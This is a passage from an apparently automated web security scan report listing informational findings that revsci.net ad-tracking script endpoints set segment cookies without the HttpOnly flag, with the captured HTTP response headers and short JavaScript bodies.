+4qcJhmo3tTD2Dn1cvueINMs=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:13:18 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 13:13:18 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.187. http://pix04.revsci.net/I10985/b3/0/3/1008211/352735390.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/352735390.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSMLHT2uikdn5vw/ZUsicc4VPat72X0BRE3fm6MNJiHGaKzb2aFbVjI59eif+fODfjX2iW0xsqMOMfyrrcddIMSklF+GlzYMSmLreI5Zy/GeW6vDj+wWQEAWvERCASNKUW1ejPcGmrIUMmJ/opLuXBEJqalRFyzz++kuS0t8FA35bmxx0Va9Cw8fcNBWphT6vuj41246c95NOaRAsl5hE/ZCrN9ltl638OMRjh6IkR46+Bn0HQbdSGKwzcO04+CyXwJk4Hw4YSr349H0jhzHFve3eZs4bvQZgRVZoV6WmyP4pc8FRjpph0jIkaE2ihTZ1EWU0vpLSFy6hYxRi9kT0nVw0G9iNfakPzZvmfKPy95K8ih9mXMMCtdrIvcMn2j4dIePr7B6ylMielihtHMj4PH19L1WPbI6B5vhMs6HbnIYcPx43tgk7tyNv/CzYfV5FqstcqOop1zqPFXKfXvvmEm0NN7M6M9909gJersEqbws/ZDBnp4g3ZVklyBZNtqf05W2rfLwB6MSKTCxJlDB6k7hioicEEcjKP6DDXwgyzvy3zXjb9F8xod4AH+mu28DlOp3pWURvqQeuQD++EpJt8x3HAB03EhK8Q3gpuZ0FUT1jb5xgJ0/NQhFabP01; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 15:26:21 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSMLHT2uikdn5vw/ZUsicc4VPat72X0BRE3fm6MNJiHGaKzb2aFbVjI59eif+fODfjX2iW0xsqMOMfyrrcddIMSklF+GlzYMSmLreI5Zy/GeW6vDj+wWQEAWvERCASNKUW1ejPcGmrIUMmJ/opLuXBEJqalRFyzz++kuS0t8FA35bmxx0Va9Cw8fcNBWphT6vuj41246c95NOaRAsl5hE/ZCrN9ltl638OMRjh6IkR46+Bn0HQbdSGKwzcO04+CyXwJk4Hw4YSr349H0jhzHFve3eZs4bvQZgRVZoV6WmyP4pc8FRjpph0jIkaE2ihTZ1EWU0vpLSFy6hYxRi9kT0nVw0G9iNfakPzZvmfKPy95K8ih9mXMMCtdrIvcMn2j4dIePr7B6ylMielihtHMj4PH19L1WPbI6B5vhMs6HbnIYcPx43tgk7tyNv/CzYfV5FqstcqOop1zqPFXKfXvvmEm0NN7M6M9909gJersEqbws/ZDBnp4g3ZVklyBZNtqf05W2rfLwB6MSKTCxJlDB6k7hioicEEcjKP6DDXwgyzvy3zXjb9F8xod4AH+mu28DlOp3pWURvqQeuQD++EpJt8x3HAB03EhK8Q3gpuZ0FUT1jb5xgJ0/NQhFabP01; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 15:26:21 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 15:26:20 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.188. http://pix04.revsci.net/I10985/b3/0/3/1008211/400010602.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/400010602.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOhOHMQT7uItGF29vyo/tk8g7ZPQp/FTCAB2QQ4O3XY0n+Y1T9p9LQR/PMkrQWV5q//Gh2ELDbiIHZeBImHWKCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa0AbFjW9PtKIFHNv4PL1RUaJzrH2RPUn836DjPQ4L4Uubj0NaY9wI2qjpCay/9h6Y4N/vrTyarBhbIQWRbm/5UVa9Cw8fcNBVhR2lbzCJpIqOW4sghTvbDbBz9w+weHTb8dgLarwU7hjL6yZdj93XkHvxvY5dXdsfw5hXREUnkNjw66X24IlHVenCkA0wjuOXTVFAOz1Gl4fXOdq1W69ZZcRIuKAboUiXAD/EtZJ5YLXLgyxsX6W69GAwwtSJ9hgyenr+hJRydFoXdFjl95IfGM461SpFeWeZrGATDQl+wtAlabX/i5kyatsFIy6hwkvyKA++ydZDLH2HoeOShYLAYudmoWVQDRzO+hVnb6RNLwyVa3DArJ33H9VFqvQFjzcY4RlI0EdqpclJQm3k9fdW3mTUe+f0892J2acHgDf/VLKbYQckiar8IaWRIXSW63/UTu+4l45BtmrY1KtcHSQw0cLtwnCnp3H2FRAAywZQt02HPQELVT7zHIxqAwb0w5rLZRZFv572OyO3tlbUSIhYgOcVdvfLBNNI=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:09:05 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOHMQT7uItGF29vyo/tk8g7ZPQp/FTCAB2QQ4O3XY0n+Y1T9p9LQR/PMkrQWV5q//Gh2ELDbiIHZeBImHWKCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa0AbFjW9PtKIFHNv4PL1RUaJzrH2RPUn836DjPQ4L4Uubj0NaY9wI2qjpCay/9h6Y4N/vrTyarBhbIQWRbm/5UVa9Cw8fcNBVhR2lbzCJpIqOW4sghTvbDbBz9w+weHTb8dgLarwU7hjL6yZdj93XkHvxvY5dXdsfw5hXREUnkNjw66X24IlHVenCkA0wjuOXTVFAOz1Gl4fXOdq1W69ZZcRIuKAboUiXAD/EtZJ5YLXLgyxsX6W69GAwwtSJ9hgyenr+hJRydFoXdFjl95IfGM461SpFeWeZrGATDQl+wtAlabX/i5kyatsFIy6hwkvyKA++ydZDLH2HoeOShYLAYudmoWVQDRzO+hVnb6RNLwyVa3DArJ33H9VFqvQFjzcY4RlI0EdqpclJQm3k9fdW3mTUe+f0892J2acHgDf/VLKbYQckiar8IaWRIXSW63/UTu+4l45BtmrY1KtcHSQw0cLtwnCnp3H2FRAAywZQt02HPQELVT7zHIxqAwb0w5rLZRZFv572OyO3tlbUSIhYgOcVdvfLBNNI=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:09:05 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 13:09:04 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.189. http://pix04.revsci.net/I10985/b3/0/3/1008211/4030732.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/4030732.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLSYGygtQN54egzBWSJbEl9R/Hk7emp9CxqGU21BjlvfqFEzHuAYT+0RMmU8yDn8fMKd76Sem/n1/A45enPmYXILccTgptCeFmnyrhXnmwcWGfPLM7ivdDuO5LCNTcsLU/YXpH9F28xHaWooScWoFISWonfb5T4sxUmX+r1XZ7sL50dfpT/3yJpT1o+KPbckpam45pexdLfiwJPJ3ppfTsioboe+cnDDJZgKgtQtXa1p7mjRWANNLdKKeG1pdtoEg==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 17:09:48 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLSYGygtQN54egzBWSJbEl9R/Hk7emp9CxqGU21BjlvfqFEzHuAYT+0RMmU8yDn8fMKd76Sem/n1/A45enPmYXILccTgptCeFmnyrhXnmwcWGfPLM7ivdDuO5LCNTcsLU/YXpH9F28xHaWooScWoFISWonfb5T4sxUmX+r1XZ7sL50dfpT/3yJpT1o+KPbckpam45pexdLfiwJPJ3ppfTsioboe+cnDDJZgKgtQtXa1p7mjRWANNLdKKeG1pdtoEg==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 17:09:48 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 17:09:47 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.190. http://pix04.revsci.net/I10985/b3/0/3/1008211/411814556.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/411814556.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47hsEu65JwcIlocE02QQ4O3XYyvheM/Ns0vAjloMpK61ewq2/t7wxEnZxc6hXT/TAhJnU0cgpqwwScHEsq8jKcVWn8biBJeiwj3bt/Z7Jno4eTUvRzGf2u88Dt+Xr5SMrCaDesP2v1b0OTJJ0SaxGkI/wp7+XJEJqbjRJx9w5bfXe8nwj2VXUacosCwLh4HW1pafBXtBaZ69LF3vwwNiRMOzM2hOzmIl3bkaNEsVIwrzqhtzkLb98whI1TyAiX4VXsMfxBwvwOTN3uNPwEJsPabBxQwHPp5/46LiCCA90/UyINB+lOenc2oXZx7bfxHZuTwOyjdiRgJsP1sXbC6eUwGWzLguW6SsMTBCG1D23QVRFUKOWM85CnTNYMCNXq3or7XEg8u2vvx0Y2vYif8fLD6jUtG/lMREU8yW7iI0DLsTrIFCkrm1kpy6i0cLlXjjhFLBrIbl2lJ/5FpXMpx8c0GKZrUAr7cCcVeLNbbQuRNOdLX2iFZDeIEyjdOSph5SNuEaU8qI8jPKp1c+1oFzm2RW+nTi7lTLQCS9QS5To51qJ+p39UCrWLj3B0M2CF0kB1krJQf+cRsNXnc5UwNIYROh1WMCYBqLdNHvxCYMTtXa1J8nLfpm0AIgPmN/9qTBoFg==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 16:59:22 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47hsEu65JwcIlocE02QQ4O3XYyvheM/Ns0vAjloMpK61ewq2/t7wxEnZxc6hXT/TAhJnU0cgpqwwScHEsq8jKcVWn8biBJeiwj3bt/Z7Jno4eTUvRzGf2u88Dt+Xr5SMrCaDesP2v1b0OTJJ0SaxGkI/wp7+XJEJqbjRJx9w5bfXe8nwj2VXUacosCwLh4HW1pafBXtBaZ69LF3vwwNiRMOzM2hOzmIl3bkaNEsVIwrzqhtzkLb98whI1TyAiX4VXsMfxBwvwOTN3uNPwEJsPabBxQwHPp5/46LiCCA90/UyINB+lOenc2oXZx7bfxHZuTwOyjdiRgJsP1sXbC6eUwGWzLguW6SsMTBCG1D23QVRFUKOWM85CnTNYMCNXq3or7XEg8u2vvx0Y2vYif8fLD6jUtG/lMREU8yW7iI0DLsTrIFCkrm1kpy6i0cLlXjjhFLBrIbl2lJ/5FpXMpx8c0GKZrUAr7cCcVeLNbbQuRNOdLX2iFZDeIEyjdOSph5SNuEaU8qI8jPKp1c+1oFzm2RW+nTi7lTLQCS9QS5To51qJ+p39UCrWLj3B0M2CF0kB1krJQf+cRsNXnc5UwNIYROh1WMCYBqLdNHvxCYMTtXa1J8nLfpm0AIgPmN/9qTBoFg==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 16:59:22 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 16:59:22 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.191. http://pix04.revsci.net/I10985/b3/0/3/1008211/434601309.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/434601309.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EmhOQMMpzaxu2F29/z4eoxYqCQLAjTX17HF2gQ4O3XYcv0liDtqNncA2iFgL2JciE4z/2iaPmPX0PZEBa5THqhL8Vtypo+SEqfqKrhJdPaHwQlBIe6iD7zRzZlP3ivfC9uJamaWvpbVB03OAqYO3nwIMN4A0EWPi0I76xpm8QBpbXOY7VjkzlzOETVPxHAI3DbYZkryrWC3bnZ7rH2dGmBeaueJuJAxniY4JFGxGrGBKxNU+Z1EdU+cEVjhrWtS1s351oN25nSmUGacCmXS4lpoEKnh/FrSF71S0ZbH4+81ohkie50df67vgKKPwqlTXFuH2GNVRLlPwTXR5/L2uXjDq+XABH4kjxxNhO2NdZjfx1E7hsDhQX7cFCfaGYYFkRv5/uPBlfOXdHxYl9LYtCCaVvHoqZBPd1YOpz4fIYhTVpAizX/w/PY+bwcyN2qrgxmZlp5NYJVFWT8rTknwCoRLG7vfKAzA/QqqCje2IdWrt2+E4htplc1oKKHKkXaqqe7he1zAEIrX5zxkD+HIy/V1gctWO51L+ADs20x91UBXCmoOkk4BgR9/XbtHI9IMwoE0eq6XV8jrb6iYexF2YIWglMT+Nw+rLYOPUYbtq0aW9N5dgN9GlQ4NhU23njUr4ecF1Uzc9YEzgAFrpqwNUiVaC0HaVpq8CPI=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 12:10:42 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EmhOQMMpzaxu2F29/z4eoxYqCQLAjTX17HF2gQ4O3XYcv0liDtqNncA2iFgL2JciE4z/2iaPmPX0PZEBa5THqhL8Vtypo+SEqfqKrhJdPaHwQlBIe6iD7zRzZlP3ivfC9uJamaWvpbVB03OAqYO3nwIMN4A0EWPi0I76xpm8QBpbXOY7VjkzlzOETVPxHAI3DbYZkryrWC3bnZ7rH2dGmBeaueJuJAxniY4JFGxGrGBKxNU+Z1EdU+cEVjhrWtS1s351oN25nSmUGacCmXS4lpoEKnh/FrSF71S0ZbH4+81ohkie50df67vgKKPwqlTXFuH2GNVRLlPwTXR5/L2uXjDq+XABH4kjxxNhO2NdZjfx1E7hsDhQX7cFCfaGYYFkRv5/uPBlfOXdHxYl9LYtCCaVvHoqZBPd1YOpz4fIYhTVpAizX/w/PY+bwcyN2qrgxmZlp5NYJVFWT8rTknwCoRLG7vfKAzA/QqqCje2IdWrt2+E4htplc1oKKHKkXaqqe7he1zAEIrX5zxkD+HIy/V1gctWO51L+ADs20x91UBXCmoOkk4BgR9/XbtHI9IMwoE0eq6XV8jrb6iYexF2YIWglMT+Nw+rLYOPUYbtq0aW9N5dgN9GlQ4NhU23njUr4ecF1Uzc9YEzgAFrpqwNUiVaC0HaVpq8CPI=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 12:10:42 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 12:10:42 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.192. http://pix04.revsci.net/I10985/b3/0/3/1008211/448263760.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/448263760.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOhOHMQT7uItGF29vyo/tk8g7ZPQu/ETCAB2QQ4O3XYiv0liHtqFncA2iMgL2Is5g9oNxqsMTbiADbei4xleib6fOTfjH1a2wyQnsvM/9rrSc8osckkFeddzYOSGbneI5567GeW6vbjOwWQEAWvERBw6TjPQ4L4Uubg0NaY9wI2KrzCfuCquS5+ymtq0blYCXboeqt1vqkp6PLPFjL00+dhAJFHV+aNKdWI3SWQJ9jzYJE3gOjtyYh9xLa/AMaH+zcOLos3pOtUoEJjiTdZfoh1MpDxoStFft4n9eONVnIExtLnEqN2My6sEyz2PxOrG9l6BdQSqHmABYkgWFWP7jxFSXUbK7RUBg3eTztOcdcVqcR3bYljEZKiH6egiDWmDppUlMfb4NNC4Llh7XBXsHRzLc8AuMKqxVe1ga4iTMfrUSwbvbl4vGJ24IbloKzsVauNIQgj3ASjfhfLysLDkP3d2+aCTk4AAqhC4JqDP2n329QAMTIk+8XFDsgf1aRQmegVej8rRrlIHrQ0mj3h9SxI5Dg3jlaU1fE3sJz+2RW+lX8QOeIgg4JxBXc3cQ2j06OXaUltH/yzGGHO2k5BBw4eWUvGo8eEvNJjYvWVvSYoM0WDuJKGnvPoziw8U3afVem+870C8ER2yK1Ixze2; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:13:45 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOHMQT7uItGF29vyo/tk8g7ZPQu/ETCAB2QQ4O3XYiv0liHtqFncA2iMgL2Is5g9oNxqsMTbiADbei4xleib6fOTfjH1a2wyQnsvM/9rrSc8osckkFeddzYOSGbneI5567GeW6vbjOwWQEAWvERBw6TjPQ4L4Uubg0NaY9wI2KrzCfuCquS5+ymtq0blYCXboeqt1vqkp6PLPFjL00+dhAJFHV+aNKdWI3SWQJ9jzYJE3gOjtyYh9xLa/AMaH+zcOLos3pOtUoEJjiTdZfoh1MpDxoStFft4n9eONVnIExtLnEqN2My6sEyz2PxOrG9l6BdQSqHmABYkgWFWP7jxFSXUbK7RUBg3eTztOcdcVqcR3bYljEZKiH6egiDWmDppUlMfb4NNC4Llh7XBXsHRzLc8AuMKqxVe1ga4iTMfrUSwbvbl4vGJ24IbloKzsVauNIQgj3ASjfhfLysLDkP3d2+aCTk4AAqhC4JqDP2n329QAMTIk+8XFDsgf1aRQmegVej8rRrlIHrQ0mj3h9SxI5Dg3jlaU1fE3sJz+2RW+lX8QOeIgg4JxBXc3cQ2j06OXaUltH/yzGGHO2k5BBw4eWUvGo8eEvNJjYvWVvSYoM0WDuJKGnvPoziw8U3afVem+870C8ER2yK1Ixze2; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:13:45 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 13:13:44 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.193. http://pix04.revsci.net/I10985/b3/0/3/1008211/450083429.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/450083429.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQXdaHyUF1KXX9ZUQI1rnykVwY0b8NIDFThSHpzPg/1KsPTtEbccXni5KjMfY2uitH8+9UVMO+wju4WEeuZFr4ZxtKSPrxl9yaWlHQGXxBEq6kSbP3BW+WtxMJfXNIYt8JIvEV1nnjdZ/WZcKlAgNqH/8UCkWVUlX3IzKU4Rt4+5EdE6wRZEwMhtqkV8tVecrz8zYDPirBQcdZhw+eLiA+vKf8IaWxJPZ0zUN9N+mZU45BtmrY1IhSHSQw8NLNwnCnp3GjAE5o+UShCE83doE5nPJB7rUvLssOKNIlrz9NOW8lII41Z0J/UMg+tZ6lcs2x2NN4=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 16:23:13 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQXdaHyUF1KXX9ZUQI1rnykVwY0b8NIDFThSHpzPg/1KsPTtEbccXni5KjMfY2uitH8+9UVMO+wju4WEeuZFr4ZxtKSPrxl9yaWlHQGXxBEq6kSbP3BW+WtxMJfXNIYt8JIvEV1nnjdZ/WZcKlAgNqH/8UCkWVUlX3IzKU4Rt4+5EdE6wRZEwMhtqkV8tVecrz8zYDPirBQcdZhw+eLiA+vKf8IaWxJPZ0zUN9N+mZU45BtmrY1IhSHSQw8NLNwnCnp3GjAE5o+UShCE83doE5nPJB7rUvLssOKNIlrz9NOW8lII41Z0J/UMg+tZ6lcs2x2NN4=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 16:23:13 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 16:23:12 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.194. http://pix04.revsci.net/I10985/b3/0/3/1008211/469061960.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/469061960.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

